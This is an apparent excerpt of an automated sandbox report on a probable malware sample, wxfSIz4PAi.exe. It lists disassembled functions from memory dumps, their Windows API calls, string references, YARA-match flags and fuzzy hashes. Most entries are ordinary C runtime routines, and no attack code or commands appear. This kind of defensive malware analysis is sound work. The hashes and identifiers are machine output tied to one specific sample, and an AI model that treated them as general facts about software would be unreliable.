Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: 3abcaf1d833c0b43dbdf51c67ed2576d6ab8f65321eebda5ff6643d6b04ddf7b
Instruction ID: df7bbd6b43df22bb4be9fc1c410e64f9820c02350ec4393f10609d324cfe3ba4
Opcode Fuzzy Hash: 3abcaf1d833c0b43dbdf51c67ed2576d6ab8f65321eebda5ff6643d6b04ddf7b
Instruction Fuzzy Hash: 7551FD72904205ABDF209B699D41EEF77A99F48364F10011FFA15962A2EB3DDD80C65C

Uniqueness

Uniqueness Score: -1.00%

Function 05B6CC22 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,05B6CC19,05B6A4C2), ref: 05B6CC30
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 05B6CC3E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 05B6CC57
SetLastError.KERNEL32(00000000,?,05B6CC19,05B6A4C2), ref: 05B6CCA9

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 152d12fcc9b38d6eb509e9b18f925b7f1960da531015352f4daf10028e3799ab
Instruction ID: 3ebdea1b4c534a7d418f50aeabaa5bb8bb0f55795605dd81902a4c303fc21484
Opcode Fuzzy Hash: 152d12fcc9b38d6eb509e9b18f925b7f1960da531015352f4daf10028e3799ab
Instruction Fuzzy Hash: 090128323493115EA7252EB5BD9CE672F55FB50772B2002BEE264840F0EF296C0045C8

Uniqueness

Uniqueness Score: -1.00%

Function 0040C9BB Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0040C9B2,0040A25B), ref: 0040C9C9
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040C9D7
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040C9F0
SetLastError.KERNEL32(00000000,?,0040C9B2,0040A25B), ref: 0040CA42

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: a89c5195120a82154cc37d67133d9963b678ac02c8548023733cd8c502b1c527
Instruction ID: ee19b3e2510f7423959140ec21889b16034e20938e88c6190324d52fb0663b51
Opcode Fuzzy Hash: a89c5195120a82154cc37d67133d9963b678ac02c8548023733cd8c502b1c527
Instruction Fuzzy Hash: 8601F572649215AEE6395FB9BDC56572A54DB01338720033FF214B12F0EA794C16954C

Uniqueness

Uniqueness Score: -1.00%

Function 05B76F80 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,05B6E697,?,?,?,05B6ED94,?), ref: 05B76F84
_free.LIBCMT ref: 05B76FB7
_free.LIBCMT ref: 05B76FDF
SetLastError.KERNEL32(00000000), ref: 05B76FEC
SetLastError.KERNEL32(00000000), ref: 05B76FF8
_abort.LIBCMT ref: 05B76FFE

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: a2875e3ccb6b8632a006c07bc9f65a419aef02cbdef471612c5cc690c003f94f
Instruction ID: 1658229377cee04dc82e6d0d1a2bd98c50e93d10c71daed8373b411a3bcd07ae
Opcode Fuzzy Hash: a2875e3ccb6b8632a006c07bc9f65a419aef02cbdef471612c5cc690c003f94f
Instruction Fuzzy Hash: 06F0A935748E1D26D3222B756C0DF6B2726EBC17B1F2501E4F939D6294EF21EC024559

Uniqueness

Uniqueness Score: -1.00%

Function 00416D19 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
_free.LIBCMT ref: 00416D50
_free.LIBCMT ref: 00416D78
SetLastError.KERNEL32(00000000), ref: 00416D85
SetLastError.KERNEL32(00000000), ref: 00416D91
_abort.LIBCMT ref: 00416D97

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: a2875e3ccb6b8632a006c07bc9f65a419aef02cbdef471612c5cc690c003f94f
Instruction ID: dffb23d06d1e15ef1aad1c845134e5c8e8eacf90562cc3591d5b7c0101a08115
Opcode Fuzzy Hash: a2875e3ccb6b8632a006c07bc9f65a419aef02cbdef471612c5cc690c003f94f
Instruction Fuzzy Hash: BDF0F43178871026C2227B367C0ABDB26299FC1775F22052FF91D92291EF2CDCC2815D

Uniqueness

Uniqueness Score: -1.00%

Function 00417253 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,-@,00000000,00000000,?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue), ref: 00417285
GetLastError.KERNEL32(?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue,0042F340,FlsSetValue,00000000,00000364,?,00416DEB), ref: 00417291
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue,0042F340,FlsSetValue,00000000), ref: 0041729F

Strings

-@, xrefs: 0041727C

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: -@
API String ID: 3177248105-2564449678
Opcode ID: 26bf22cc59954dcc6720876a51754d7684b8387ef23ad7c861cfe47f39fec3a2
Instruction ID: 7e42d4c6809e44159ca8b586cb0097734ec1077dc4da662fe3f049ba49388dcf
Opcode Fuzzy Hash: 26bf22cc59954dcc6720876a51754d7684b8387ef23ad7c861cfe47f39fec3a2
Instruction Fuzzy Hash: 8B01F7367492279BC7314B699C44A977BB8AF55760B500671F909D7240DB34DC43C6E8

Uniqueness

Uniqueness Score: -1.00%

Function 05B61AE6 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 39COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 05B61B30
std::system_error::system_error.LIBCPMT ref: 05B61B3F

Strings

ios_base::eofbit set, xrefs: 05B61B07
ios_base::badbit set, xrefs: 05B61AF7, 05B61B18
ios_base::failbit set, xrefs: 05B61B02, 05B61B39

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::system_error::system_error
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 1589814233-1866435925
Opcode ID: 2b3e5ca4bc1d127b2dba606601132dddbbf971fcac2ee0ac16a13b9037fe9581
Instruction ID: 6e6b2a7f123702e0d247da9db79ec719f5580e821bcf6e358d92346ab7dcbcf8
Opcode Fuzzy Hash: 2b3e5ca4bc1d127b2dba606601132dddbbf971fcac2ee0ac16a13b9037fe9581
Instruction Fuzzy Hash: 50F0F67160031DBBCF10AA988C44FE97B98DF09690F15C0B5ED4477180E7BDB904C2E8

Uniqueness

Uniqueness Score: -1.00%

Function 0040187F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 39COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
std::system_error::system_error.LIBCPMT ref: 004018D8

Strings

ios_base::badbit set, xrefs: 00401890, 004018B1
ios_base::failbit set, xrefs: 0040189B, 004018D2
ios_base::eofbit set, xrefs: 004018A0

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: Exception@8Throwstd::system_error::system_error
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 1589814233-1866435925
Opcode ID: 2b3e5ca4bc1d127b2dba606601132dddbbf971fcac2ee0ac16a13b9037fe9581
Instruction ID: e154b9f444e369befffee57ff699e9c141b04c4d0561678f3d19f5bf610271a8
Opcode Fuzzy Hash: 2b3e5ca4bc1d127b2dba606601132dddbbf971fcac2ee0ac16a13b9037fe9581
Instruction Fuzzy Hash: AEF0226280031CB7DB10BAA18C02FEA7B988F0A754F21C03BFD40361E0E77D5A0482ED

Uniqueness

Uniqueness Score: -1.00%

Function 00413A6C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00413A1D,00000003,?,004139BD,00000003,00438DB0,0000000C,00413B14,00000003,00000002), ref: 00413A8C
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00413A9F
FreeLibrary.KERNEL32(00000000,?,?,?,00413A1D,00000003,?,004139BD,00000003,00438DB0,0000000C,00413B14,00000003,00000002,00000000), ref: 00413AC2

Strings

mscoree.dll, xrefs: 00413A85
CorExitProcess, xrefs: 00413A97

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9dff5006f0e47c0e7765be968ad1406b64006eb2177cec7e1fa0986365244e9b
Instruction ID: 222490b34c4e53a5feae2b87ffa662e2080e553be967456abbd25fb90b6b76cf
Opcode Fuzzy Hash: 9dff5006f0e47c0e7765be968ad1406b64006eb2177cec7e1fa0986365244e9b
Instruction Fuzzy Hash: 1EF08130A10218FBDB109F91DC09BAEBFB8EF54752F400069F809A2290DB344E45CA9C

Uniqueness

Uniqueness Score: -1.00%

Function 05B7ABB7 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0eed48df6d33df695e27a89dff6e70afad1f3040da07926e72b140e158843729
Instruction ID: 51a076d8a8ad3d59fd4f43a00c90828ec243c481c7252864214fffb0d9495081
Opcode Fuzzy Hash: 0eed48df6d33df695e27a89dff6e70afad1f3040da07926e72b140e158843729
Instruction Fuzzy Hash: D4717331A0421E9FCB61CF58CC84ABFBB76FF45351F2841A9E83567190D770AA41CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0041A950 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0eed48df6d33df695e27a89dff6e70afad1f3040da07926e72b140e158843729
Instruction ID: b33920a143986800139fcf22d81ba1a33bebe7e0c53b62ede7835c02ac38fde1
Opcode Fuzzy Hash: 0eed48df6d33df695e27a89dff6e70afad1f3040da07926e72b140e158843729
Instruction Fuzzy Hash: 9E712A71D062969BCB308F94C844AFFBB76EF41360F14022BE91457280D774ACE1C7AA

Uniqueness

Uniqueness Score: -1.00%

Function 05B752CA Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 05B7533C
_free.LIBCMT ref: 05B7535C

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: fc0b85d39114581f424b2cc9b7309e7922e8a4a29b980e46ef1ebf5c619b313d
Instruction ID: e00a5ce4fb7ede9ad3221f3142939c84e7fbe5a5e86c5397a79b4ec3e07c9ea0
Opcode Fuzzy Hash: fc0b85d39114581f424b2cc9b7309e7922e8a4a29b980e46ef1ebf5c619b313d
Instruction Fuzzy Hash: 8B41D136B002089FDB24DF78C884A6DB3F6FF85314B1645A9D566EB290DB71B905CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00415063 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 004150D5
_free.LIBCMT ref: 004150F5

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: fc0b85d39114581f424b2cc9b7309e7922e8a4a29b980e46ef1ebf5c619b313d
Instruction ID: 119d67276799711db09ecd5bf14b9939420992e10a89990823b09dedeceb6b84
Opcode Fuzzy Hash: fc0b85d39114581f424b2cc9b7309e7922e8a4a29b980e46ef1ebf5c619b313d
Instruction Fuzzy Hash: F941E232E00700EBCB15DF79C880A9EB7B1EF89318B1545AAE515EB392D634AD41CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0041B300 Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0041197C,?,00000000,?,00000001,?,?,00000001,0041197C,?), ref: 0041B34D
__alloca_probe_16.LIBCMT ref: 0041B385
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0041B3D6
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00410DD1,?), ref: 0041B3E8
__freea.LIBCMT ref: 0041B3F1

Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: d59019c36856c0d038f4f00fa65e6381e0e9e1f4e06c47476786303ee0ade61e
Instruction ID: fe6b59a793102c77a27ef18a3bbb39662c21b96f940faf78fbed62ac6a6f166a
Opcode Fuzzy Hash: d59019c36856c0d038f4f00fa65e6381e0e9e1f4e06c47476786303ee0ade61e
Instruction Fuzzy Hash: 3831BF72A0021A9BDB249F65CC41EEF7BA5EB40310F04012EFC14D7291EB39DDA1CB99

Uniqueness

Uniqueness Score: -1.00%

Function 05B7E66A Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 05B7E673
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 05B7E696

Part of subcall function 05B77CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05B77CDE

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 05B7E6BC
_free.LIBCMT ref: 05B7E6CF
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 05B7E6DE

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: a2b97d9722a52550099a0d12c6cf1aac4d01039bf2330feb9bda49d958931312
Instruction ID: 42874ee288cfdcfb763242f08e0feb91484538916bab786f9574dcf67e84d751
Opcode Fuzzy Hash: a2b97d9722a52550099a0d12c6cf1aac4d01039bf2330feb9bda49d958931312
Instruction Fuzzy Hash: C201DF7270521D7F27315ABA5C8CC7B7A6DEEC2AA071401F9F925D2250EE61EC02E1BD

Uniqueness

Uniqueness Score: -1.00%

Function 0041E403 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0041E40C
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041E42F

Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0041E455
_free.LIBCMT ref: 0041E468
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041E477

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: a34debf33ccdb7c840dc0c30cab86c6cd241ab08fa36fff5cfa760907aeefc26
Instruction ID: e222fc366bdc9891f1000934aff4c77bc857fdd668f389f9b834644977e06484
Opcode Fuzzy Hash: a34debf33ccdb7c840dc0c30cab86c6cd241ab08fa36fff5cfa760907aeefc26
Instruction Fuzzy Hash: 9001847AA012157B27211AB75C8CDFB6A6DDEC6FA4315012AFD08D3201DE688C82C5B9

Uniqueness

Uniqueness Score: -1.00%

Function 05B77004 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,05B725ED,05B77307,?,05B76FAE,00000001,00000364,?,05B6E697,?,?,?,05B6ED94,?), ref: 05B77009
_free.LIBCMT ref: 05B7703E
_free.LIBCMT ref: 05B77065
SetLastError.KERNEL32(00000000), ref: 05B77072
SetLastError.KERNEL32(00000000), ref: 05B7707B

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 2a6d9975e68edca73772c522f74d58e38e99fa7ec2a6d048bd801e93f761d665
Instruction ID: 46ce51c7386bddb831631b1dbd2c654ca6dcee3ed94abc9742a122ca1a3abc0c
Opcode Fuzzy Hash: 2a6d9975e68edca73772c522f74d58e38e99fa7ec2a6d048bd801e93f761d665
Instruction Fuzzy Hash: 9001F97674460C27973267756C88E7F2A1BEBC127072001F8F436A2290FE21EC0241A9

Uniqueness

Uniqueness Score: -1.00%

Function 00416D9D Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00412386,004170A0,?,00416D47,00000001,00000364,?,0040E430,?,?,?,0040EB2D,?), ref: 00416DA2
_free.LIBCMT ref: 00416DD7
_free.LIBCMT ref: 00416DFE
SetLastError.KERNEL32(00000000), ref: 00416E0B
SetLastError.KERNEL32(00000000), ref: 00416E14

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 2a6d9975e68edca73772c522f74d58e38e99fa7ec2a6d048bd801e93f761d665
Instruction ID: 6e49a9887b0250ccd633565296769d6b3062fe87a49412782ccaa8615f8c8364
Opcode Fuzzy Hash: 2a6d9975e68edca73772c522f74d58e38e99fa7ec2a6d048bd801e93f761d665
Instruction Fuzzy Hash: C201F9363847106792217676BC85EEB262D9BC5374763027FF819922D2EF3DCC92505D

Uniqueness

Uniqueness Score: -1.00%

Function 0041ED6E Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0041ED86

Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2

_free.LIBCMT ref: 0041ED98
_free.LIBCMT ref: 0041EDAA
_free.LIBCMT ref: 0041EDBC
_free.LIBCMT ref: 0041EDCE

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 12b51190f65240c3d2ef2a1ad5896f3b430592fd2ccf38004c9c9016fab84203
Instruction ID: d5ef32133b98e4fb2412931fa35fae6bc57e2fe493cbd1108eefdbae164f4dde
Opcode Fuzzy Hash: 12b51190f65240c3d2ef2a1ad5896f3b430592fd2ccf38004c9c9016fab84203
Instruction Fuzzy Hash: 6DF04F32544310ABCA20EB6AF885DDB73E9BA44714755181AF848D7640C638FCC0865D

Uniqueness

Uniqueness Score: -1.00%

Function 05B75519 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 05B75537

Part of subcall function 05B76501: HeapFree.KERNEL32(00000000,00000000,?,05B7F288,?,00000000,?,00000000,?,05B7F52C,?,00000007,?,?,05B7F920,?), ref: 05B76517
Part of subcall function 05B76501: GetLastError.KERNEL32(?,?,05B7F288,?,00000000,?,00000000,?,05B7F52C,?,00000007,?,?,05B7F920,?,?), ref: 05B76529

_free.LIBCMT ref: 05B75549
_free.LIBCMT ref: 05B7555C
_free.LIBCMT ref: 05B7556D
_free.LIBCMT ref: 05B7557E

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 90edccbe862cdad6193eb808b69496e37856ffec839fd57042e26aa05c578d31
Instruction ID: 6f21541a41c2e5a2e4c85efebad794aeb683b403d0868f4b18064965e7b279d5
Opcode Fuzzy Hash: 90edccbe862cdad6193eb808b69496e37856ffec839fd57042e26aa05c578d31
Instruction Fuzzy Hash: B4F054B0D115189BCB37AF64FC446153761FB0461031275AEF12452278DF3667919FCB

Uniqueness

Uniqueness Score: -1.00%

Function 004152B2 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004152D0

Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2

_free.LIBCMT ref: 004152E2
_free.LIBCMT ref: 004152F5
_free.LIBCMT ref: 00415306
_free.LIBCMT ref: 00415317

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 90edccbe862cdad6193eb808b69496e37856ffec839fd57042e26aa05c578d31
Instruction ID: 804699b6a5c80bac2842bae3f4e6e7460cbec33686f784624dec7bd42b1af61a
Opcode Fuzzy Hash: 90edccbe862cdad6193eb808b69496e37856ffec839fd57042e26aa05c578d31
Instruction Fuzzy Hash: 41F030714413209B8A16BF15FC416893B60FB4871831275AFF50866275CB3959918FCE

Uniqueness

Uniqueness Score: -1.00%

Function 0041608E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

Strings

@, xrefs: 0041618D

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2895899722
Opcode ID: 70cdf97db86fb0d935fe44adb4be9c8666ab98f3e4a20976dc49b384eadb291b
Instruction ID: ae3557305dc9c54a6d59b1edd30c6b9f9c56a404ae947bd98c264bdf0008d32a
Opcode Fuzzy Hash: 70cdf97db86fb0d935fe44adb4be9c8666ab98f3e4a20976dc49b384eadb291b
Instruction Fuzzy Hash: EF51D171D00209ABDB10AFA9C845FEF7BB8AF45314F12015BE804B7292D778D982CB69

Uniqueness

Uniqueness Score: -1.00%

Function 05B7352A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\wxfSIz4PAi.exe,00000104), ref: 05B7356A
_free.LIBCMT ref: 05B73635
_free.LIBCMT ref: 05B7363F

Strings

C:\Users\user\Desktop\wxfSIz4PAi.exe, xrefs: 05B73561, 05B73568, 05B73597, 05B735CF

Memory Dump Source

Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\wxfSIz4PAi.exe
API String ID: 2506810119-4117991884
Opcode ID: cb31f26f73b597728b2cacf79e07e2f55e925ef4aaaec1d2d24814769dd1ca0b
Instruction ID: e1d83d8884dc6b3ff51b7a9b437d4aae6931abffcdc724a40792d48e87f13da3
Opcode Fuzzy Hash: cb31f26f73b597728b2cacf79e07e2f55e925ef4aaaec1d2d24814769dd1ca0b
Instruction Fuzzy Hash: 483180B1E0425CAFDB21DF999C84DAEBBFDEF84710F1044E6E52597210DB70AA40DB94

Uniqueness

Uniqueness Score: -1.00%

Function 004132C3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\wxfSIz4PAi.exe,00000104), ref: 00413303
_free.LIBCMT ref: 004133CE
_free.LIBCMT ref: 004133D8

Strings

C:\Users\user\Desktop\wxfSIz4PAi.exe, xrefs: 004132FA, 00413301, 00413330, 00413368

Memory Dump Source

Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\wxfSIz4PAi.exe
API String ID: 2506810119-4117991884
Opcode ID: cb31f26f73b597728b2cacf79e07e2f55e925ef4aaaec1d2d24814769dd1ca0b
